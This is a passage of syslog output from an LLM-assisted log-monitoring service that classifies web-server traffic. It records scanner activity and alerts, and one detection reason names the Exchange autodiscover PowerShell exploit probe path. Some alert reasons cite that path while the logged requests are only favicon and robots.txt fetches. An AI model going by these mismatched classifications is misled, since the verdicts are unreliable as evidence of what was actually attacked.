observer[1565011]: 2026/03/20 10:22:31.933969 [observer] Pipeline: processed=4178 
pattern_hits=4098 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:22:31.933995 [observer] Patterns: hash=4098 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:23:01.945022 [observer] Pipeline: processed=4180 pattern_hits=4100 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:23:01.945060 [observer] Patterns: hash=4100 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:23:31.952557 [observer] Pipeline: processed=4184 pattern_hits=4104 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:23:31.952586 [observer] Patterns: hash=4104 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:24:01.939902 [observer] Pipeline: processed=4188 pattern_hits=4108 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:24:01.942543 [observer] Patterns: hash=4108 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:24:31.949957 [observer] Pipeline: processed=4190 pattern_hits=4110 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:24:31.949981 [observer] Patterns: hash=4110 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:01.943302 [observer] Pipeline: processed=4194 pattern_hits=4114 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:01.943341 [observer] Patterns: hash=4114 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:25:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 10:25:31.933966 [observer] Pipeline: processed=4196 pattern_hits=4116 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:31.934009 [observer] Patterns: hash=4116 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:25:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:44.747740 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 10:25:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:44.747778 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 10:25:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:44.747888 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T10:25:38.358031219Z 168.76.20.229 - - [20/Mar/2026:10:25:38 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, li... Mar 20 10:25:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:49.173381 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 10:25:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:49.173424 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 10:25:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:25:49.173473 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T10:25:38.799377483Z 168.76.20.229 - - [20/Mar/2026:10:25:38 +0000] "54.200.221.0" "GET /robots.txt HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, lik... Mar 20 10:26:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:26:02.031115 [observer] Pipeline: processed=4206 pattern_hits=4124 llm_calls=82 llm_errors=1 learned=0 Mar 20 10:26:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:26:02.031477 [observer] Patterns: hash=4124 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82 Mar 20 10:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:26:31.940652 [observer] Pipeline: processed=4208 pattern_hits=4126 llm_calls=82 llm_errors=1 learned=0 Mar 20 10:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:26:31.940675 [observer] Patterns: hash=4126 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82 Mar 20 10:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:27:01.946484 [observer] Pipeline: processed=4210 pattern_hits=4128 llm_calls=82 llm_errors=1 learned=0 Mar 20 10:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:27:01.946508 [observer] Patterns: hash=4128 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82 Mar 20 10:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:27:31.935407 [observer] Pipeline: processed=4214 pattern_hits=4132 llm_calls=82 llm_errors=1 learned=0 Mar 20 10:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:27:31.935434 [observer] Patterns: hash=4132 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82 Mar 20 10:28:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:28:02.098641 [observer] Pipeline: processed=4216 pattern_hits=4134 llm_calls=82 llm_errors=1 learned=0 Mar 20 10:28:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:28:02.098674 [observer] Patterns: hash=4134 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82 Mar 20 10:28:31 ip-172-26-12-110 observer[1565011]: 
2026/03/20 10:28:31.935231 [observer] Pipeline: processed=4222 pattern_hits=4140 llm_calls=82 llm_errors=1 learned=0 Mar 20 10:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:28:31.935262 [observer] Patterns: hash=4140 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82 Mar 20 10:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:01.960813 [observer] Pipeline: processed=4224 pattern_hits=4142 llm_calls=82 llm_errors=1 learned=0 Mar 20 10:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:01.960956 [observer] Patterns: hash=4142 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82 Mar 20 10:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:31.933995 [observer] Pipeline: processed=4228 pattern_hits=4146 llm_calls=82 llm_errors=1 learned=0 Mar 20 10:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:31.934019 [observer] Patterns: hash=4146 prefix=0 regex=0 contains=0 deny=21 alert=299 suppress=0 misses=82 Mar 20 10:29:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:44.606841 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 10:29:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:44.606886 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access from an external IP with a CensysInspect user agent hitting the root path and issuing a redirect could indicate automated scanning or probing activity. Line=2026-03-20T10:29:36.746235581Z 66.132.172.142 - - [20/Mar/2026:10:29:36 +0000] "login.admin.kovicloud.com" "GET / HTTP/1.1" 302 138 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.cens... 
Mar 20 10:29:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:44.607001 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T10:29:36.881547062Z 66.132.172.142 - - [20/Mar/2026:10:29:36 +0000] "_" "PRI * HTTP/2.0" 400 150 "-" "-" "-" Mar 20 10:29:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:44.607042 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T10:29:39.962393883Z 66.132.172.142 - - [20/Mar/2026:10:29:39 +0000] "_" "\x16\x03\x01\x01\x10\x01\x00\x01\x0C\x03\x03`mx\x17\xC3\x83\xA1\x95\xB8\xBC;I\xA8\xB3\xE9\xB4X\xD8R\xF0\xAE6\xE3\xE3... Mar 20 10:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:30:01.979570 [observer] Pipeline: processed=4233 pattern_hits=4150 llm_calls=83 llm_errors=1 learned=0 Mar 20 10:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:30:01.979610 [observer] Patterns: hash=4150 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83 Mar 20 10:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:30:31.950532 [observer] Pipeline: processed=4235 pattern_hits=4152 llm_calls=83 llm_errors=1 learned=0 Mar 20 10:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:30:31.950560 [observer] Patterns: hash=4152 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83 Mar 20 10:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:31:01.949294 [observer] Pipeline: processed=4239 pattern_hits=4156 llm_calls=83 llm_errors=1 learned=0 Mar 20 10:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:31:01.949328 [observer] Patterns: hash=4156 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83 Mar 20 10:31:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 10:31:31.945624 [observer] Pipeline: processed=4241 pattern_hits=4158 llm_calls=83 llm_errors=1 learned=0 Mar 20 10:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:31:31.945647 [observer] Patterns: hash=4158 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83 Mar 20 10:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:01.975772 [observer] Pipeline: processed=4245 pattern_hits=4162 llm_calls=83 llm_errors=1 learned=0 Mar 20 10:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:01.975839 [observer] Patterns: hash=4162 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83 Mar 20 10:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:31.936305 [observer] Pipeline: processed=4250 pattern_hits=4165 llm_calls=85 llm_errors=1 learned=0 Mar 20 10:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:31.936329 [observer] Patterns: hash=4165 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=85 Mar 20 10:32:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:36.849331 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix Mar 20 10:32:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:36.849376 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 10:32:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:36.940022 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.92 action=allow pattern_type=prefix Mar 20 10:32:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:36.940075 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "captain.admin.kovicloud.com" Mar 20 10:32:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:40.737827 [analyzer] LLM verdict for 
docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 10:32:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:40.737868 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+) Mar 20 10:32:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:44.488455 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix Mar 20 10:32:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:44.488499 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 10:32:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:47.675420 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.85 action=allow pattern_type=prefix Mar 20 10:32:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:47.675459 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "captain.admin.kovicloud.com" Mar 20 10:32:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:50.125263 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix Mar 20 10:32:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:50.125296 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 10:32:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:53.687290 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 20 10:32:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:53.687333 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+) Mar 20 10:32:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 
10:32:53.897870 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 10:32:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:53.897910 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 10:32:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:57.825497 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 20 10:32:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:57.825534 [analyzer] Confidence 0.82 too low for pattern learning (need 0.85+) Mar 20 10:32:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:58.029396 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.90 action=allow pattern_type=prefix Mar 20 10:32:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:58.029438 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 10:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:01.791138 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.85 action=allow pattern_type=prefix Mar 20 10:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:01.791213 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "captain.admin.kovicloud.com" Mar 20 10:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:01.984969 [observer] Pipeline: processed=4263 pattern_hits=4169 llm_calls=94 llm_errors=1 learned=3 Mar 20 10:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:01.985007 [observer] Patterns: hash=4169 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=94 Mar 20 10:33:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 10:33:31.942331 [observer] Pipeline: processed=4267 pattern_hits=4173 llm_calls=94 llm_errors=1 learned=3 Mar 20 10:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:31.942356 [observer] Patterns: hash=4173 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=94 Mar 20 10:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:34:01.965116 [observer] Pipeline: processed=4269 pattern_hits=4175 llm_calls=94 llm_errors=1 learned=3 Mar 20 10:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:34:01.965146 [observer] Patterns: hash=4175 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=94 Mar 20 10:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:34:31.935935 [observer] Pipeline: processed=4273 pattern_hits=4179 llm_calls=94 llm_errors=1 learned=3 Mar 20 10:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:34:31.935963 [observer] Patterns: hash=4179 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=94 Mar 20 10:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:00.228848 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 10:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:00.228890 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 10:35:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:02.054523 [observer] Pipeline: processed=4277 pattern_hits=4181 llm_calls=96 llm_errors=1 learned=3 Mar 20 10:35:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:02.054554 [observer] Patterns: hash=4181 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=96 Mar 20 10:35:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:04.236012 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 20 10:35:04 ip-172-26-12-110 
observer[1565011]: 2026/03/20 10:35:04.236178 [analyzer] Source hint mismatch: LLM says "tc-qos-helper", actual is "captain-netdata-container" — skipping pattern Mar 20 10:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:11.318591 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 10:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:11.318623 [hints] Suggestion for docker:captain-netdata-container: field type "timestamp" seen in 19/20 lines, example: "2026-03-20T10:34:53.594941080Z" → "" Mar 20 10:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:11.318638 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A warning about a missing configuration file can indicate misconfiguration or missing deployment assets. Not inherently malicious, but warrants attention. Line=2026-03-20T10:34:53.594941080Z 2026-03-20 10:34:53: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'. 
Mar 20 10:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:31.936438 [observer] Pipeline: processed=4282 pattern_hits=4185 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:31.936463 [observer] Patterns: hash=4185 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:36:01.940753 [observer] Pipeline: processed=4284 pattern_hits=4187 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:36:01.940778 [observer] Patterns: hash=4187 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:36:31.934529 [observer] Pipeline: processed=4288 pattern_hits=4191 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:36:31.934572 [observer] Patterns: hash=4191 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:37:01.963535 [observer] Pipeline: processed=4290 pattern_hits=4193 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:37:01.963568 [observer] Patterns: hash=4193 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:37:31.950541 [observer] Pipeline: processed=4292 pattern_hits=4195 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:37:31.950569 [observer] Patterns: hash=4195 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:38:01.943153 [observer] Pipeline: processed=4296 pattern_hits=4199 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:38:01.943207 [observer] Patterns: 
hash=4199 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:38:31.939776 [observer] Pipeline: processed=4300 pattern_hits=4203 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:38:31.939802 [observer] Patterns: hash=4203 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:39:01.953673 [observer] Pipeline: processed=4304 pattern_hits=4207 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:39:01.953707 [observer] Patterns: hash=4207 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:39:31.934533 [observer] Pipeline: processed=4306 pattern_hits=4209 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:39:31.934554 [observer] Patterns: hash=4209 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:40:01.948977 [observer] Pipeline: processed=4310 pattern_hits=4213 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:40:01.949022 [observer] Patterns: hash=4213 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:40:31.943718 [observer] Pipeline: processed=4312 pattern_hits=4215 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:40:31.943748 [observer] Patterns: hash=4215 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:41:01.952579 [observer] Pipeline: processed=4314 pattern_hits=4217 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:41:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 10:41:01.952654 [observer] Patterns: hash=4217 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:41:31.942880 [observer] Pipeline: processed=4318 pattern_hits=4221 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:41:31.942908 [observer] Patterns: hash=4221 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:42:02.056672 [observer] Pipeline: processed=4320 pattern_hits=4223 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:42:02.056712 [observer] Patterns: hash=4223 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:42:31.938709 [observer] Pipeline: processed=4324 pattern_hits=4227 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:42:31.938737 [observer] Patterns: hash=4227 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:43:01.946791 [observer] Pipeline: processed=4326 pattern_hits=4229 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:43:01.946827 [observer] Patterns: hash=4229 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:43:31.934245 [observer] Pipeline: processed=4332 pattern_hits=4235 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:43:31.934277 [observer] Patterns: hash=4235 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:44:01.941369 [observer] Pipeline: 
processed=4334 pattern_hits=4237 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:44:01.941396 [observer] Patterns: hash=4237 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:44:31.950137 [observer] Pipeline: processed=4336 pattern_hits=4239 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:44:31.950185 [observer] Patterns: hash=4239 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:45:01.945555 [observer] Pipeline: processed=4340 pattern_hits=4243 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:45:01.945585 [observer] Patterns: hash=4243 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:45:31.945764 [observer] Pipeline: processed=4342 pattern_hits=4245 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:45:31.945795 [observer] Patterns: hash=4245 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:46:01.943606 [observer] Pipeline: processed=4346 pattern_hits=4249 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:46:01.944051 [observer] Patterns: hash=4249 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:46:31.935432 [observer] Pipeline: processed=4348 pattern_hits=4251 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:46:31.935461 [observer] Patterns: hash=4251 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:47:01 
